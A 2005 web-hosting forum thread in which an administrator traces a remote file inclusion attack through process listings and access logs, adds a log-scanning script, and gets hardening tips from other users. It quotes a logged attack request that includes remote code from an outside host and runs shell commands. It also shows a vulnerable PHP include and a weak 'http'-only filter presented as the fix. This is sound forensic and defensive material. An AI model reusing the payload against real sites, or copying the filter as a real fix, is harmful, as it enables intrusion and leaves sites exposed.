
Catching a Hacker

Discussion in 'Plesk for Linux - 8.x and Older' started by gromett, Jun 26, 2005.

  1. gromett

    gromett Guest

    0
     
    I am happy to say that since moving on to Plesk, attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross-server scripting ones. Currently I just monitor the /tmp and /var/tmp directories for suspicious files every minute, which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the client's dodgy script. I am posting this to help others who may not have the time or knowledge to do so.

    1) I went to /var/tmp and moved all files to /root/hack for later perusal.
    2) Did a ps aux to get the process IDs and file names of the scripts being run.
    apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
    These had been created by a shell called /.x
    3) Did a netstat -lvanp to find out the remote IP of the attacker.
    tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
    4) The hacker's IP is 222.124.31.12. Now to find out which script was responsible for the breach.
    5) Used this find command to check all log files:
    find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
    6) From this I could see the site name (modified):
    cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log

    Here is a sample log entry:
    /eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"

    The script is called eolaud.php.
    I had a look at this script and it had 1 line of PHP code in it:
    <?php
    // Deliberately vulnerable original: $SiteRef is taken straight from the
    // request (register_globals), so whatever the caller supplies gets included.
    include $SiteRef;
    ?>

    You can see that by passing ?SiteRef=......
    you could include a file or script from another site.

    I changed this script to the following and notified the client:
    <?php
    // Blank the variable if it contains "http" anywhere, case-insensitively.
    // eregi() was removed in PHP 7; preg_match() with the i flag is the same test.
    if (preg_match("/http/i", $SiteRef)) {
        $SiteRef = "";
    }
    include $SiteRef;
    ?>

    If a remote address is now entered it blanks the variable.

    In addition to this I have contacted the 4 hosts that were used by the hacker, including
    http://geocities.com/evikhobare/dodol.txt
    www.virama.com
    the IP owner for the hacker, and the site where he had his hacking tools hosted.
    Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.

    I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp.

    I hope this info helps.


    Regards Karl
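    The hourly access_log scan described in the post, as an added example that is not Karl's script: it parses Apache combined-format lines, flags requests whose query parameters carry a remote URL (the include trick above), a command parameter, or a /tmp or /var/tmp path, and lists the client IPs to grep for afterwards. The log lines are constructed; the first reuses the request and attacker IP quoted in the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access_log lines (Apache "combined" format), not from the post's server.
SAMPLE_LOG = """\
222.124.31.12 - - [26/Jun/2005:19:31:02 +0100] "GET /eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"
10.0.0.5 - - [26/Jun/2005:19:31:10 +0100] "GET /eolaud.php?SiteRef=pages/about.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Jun/2005:19:33:00 +0100] "GET /shop.php?cmd=cd%20/tmp;ls HTTP/1.1" 500 0 "-" "curl/7.12"
"""

# One combined-format line: client IP, ident, user, [time], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)  # parameter value is a remote URL
TMP_PATH = re.compile(r'(?<![\w.])/(?:var/)?tmp(?!\w)')        # /tmp or /var/tmp inside a value
SHELL_PARAMS = {"cmd", "exec", "command"}                        # parameter names used to pass commands

def suspicious_reasons(target):
    """Explain why a request target looks like a remote-include or /tmp dropper attempt (empty if clean)."""
    reasons = []
    _, _, query = target.partition("?")
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        if REMOTE_URL.match(value):
            reasons.append(f"remote URL passed in {name!r}")
        if name.lower() in SHELL_PARAMS:
            reasons.append(f"command parameter {name!r}")
        if TMP_PATH.search(value):
            reasons.append(f"/tmp path in {name!r}")
    return reasons

def scan_access_log(text):
    """Return (ip, status, target, reasons) for every flagged line; unparseable lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := suspicious_reasons(m["target"])):
            hits.append((m["ip"], int(m["status"]), m["target"], reasons))
    return hits

def attacker_ips(text):
    """Distinct client IPs behind the flagged requests, i.e. the list to feed into a per-IP grep."""
    return sorted({ip for ip, _, _, _ in scan_access_log(text)})

if __name__ == "__main__":
    for ip, status, target, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, status, target, "; ".join(reasons))
```

Run it against a real file with scan_access_log(open(path).read()); a hit with status 200 means the include succeeded and the host needs the /tmp check from step 1.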
     
  2. imiles

    imiles Guest

    0
     
    Karl,

    Congratulations with your "catch" and thanks for sharing this with us.

    Just one extra question: when you say that you monitor /tmp and /var/tmp every minute, what are you actually doing and looking for?

    Ingrid.
     
  3. Luckiestlee

    Luckiestlee Guest

    0
     
    Thanks for sharing the info, Karl.

    I had quite a similar attack and it's filling my bandwidth.

    But now, instead of monitoring my /var/tmp and /tmp, I made a personal partition for /tmp and loaded it with noexec and nosuid.
    I also changed the mode of wget, c**, gcc** to 600 (root only access) and scanned through my home/httpd/vhost for unusual files, especially files owned by apache and world writeable. When it was all gone, my server was normal again.

    Regards
    Lucky
     